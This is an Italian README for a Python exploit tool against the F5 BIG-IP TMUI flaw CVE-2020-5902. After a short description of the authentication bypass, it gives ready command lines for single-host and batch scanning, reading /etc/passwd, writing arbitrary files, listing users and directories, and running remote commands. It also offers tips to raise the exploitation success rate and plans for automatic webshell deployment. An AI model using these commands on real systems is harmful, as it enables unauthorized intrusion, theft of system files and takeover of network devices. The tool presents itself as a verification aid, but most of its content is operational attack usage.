
Strumento di verifica automatica per F5 BIG-IP RCE CVE-2020-5902
Il 6 luglio 2020, è stata divulgata online la vulnerabilità RCE di F5 BIG-IP TMUI.
Il componente TMUI (Traffic Management User Interface) di F5 BIG-IP presenta una vulnerabilità di bypass dell'autenticazione. Il problema risiede nella differenza tra l'URL analizzato da Tomcat e request.getPathInfo(), che consente di aggirare i controlli di autorizzazione e di accedere senza autenticazione a tutte le funzionalità del modulo TMUI, permettendo di leggere/scrivere file arbitrari, eseguire comandi, ecc.
Per maggiori dettagli, fare riferimento a Riproduzione e note sulla vulnerabilità F5 BIG-IP TMUI RCE (CVE-2020-5902)
Questo strumento supporta il rilevamento su singolo IP e su batch di IP; può eseguire lettura/scrittura di file, elenco degli utenti autenticati, elenco delle directory, esecuzione remota di comandi e rilevamento del bypass dell'autenticazione hsqldb.
pip install requests
python f5-bigip-rce-cve-2020-5902.py -h

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --check

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --check -t 20 -s 10

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --fileread "/etc/passwd"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --filepath "/tmp/xxx.txt" --filecontent "x"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --list-users

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --listdir "/tmp/"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --rce id --still-exploit

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --rce whoami --still-exploit -s 15 -t 20

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --bypass-hsqldb

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --bypass-hsqldb

Per gli IP in batch, cerca di aggiungere http:// o https:// all'inizio; se non è specificato alcun protocollo, verrà aggiunto automaticamente http://
Se le condizioni lo consentono, si consiglia di aggiungere il parametro --still-exploit: eseguirà comunque la RCE anche se "list auth user" fallisce, aumentando il tasso di successo.
Inviare più richieste per aumentare il tasso di successo in batch; occorre bilanciare l'efficienza.
Integrare lo sfruttamento della deserializzazione tramite l'interfaccia hsqldb.
Aggiungere la scrittura automatica di webshell.
issus
lsablog
gmail:[email protected]
qq:[email protected]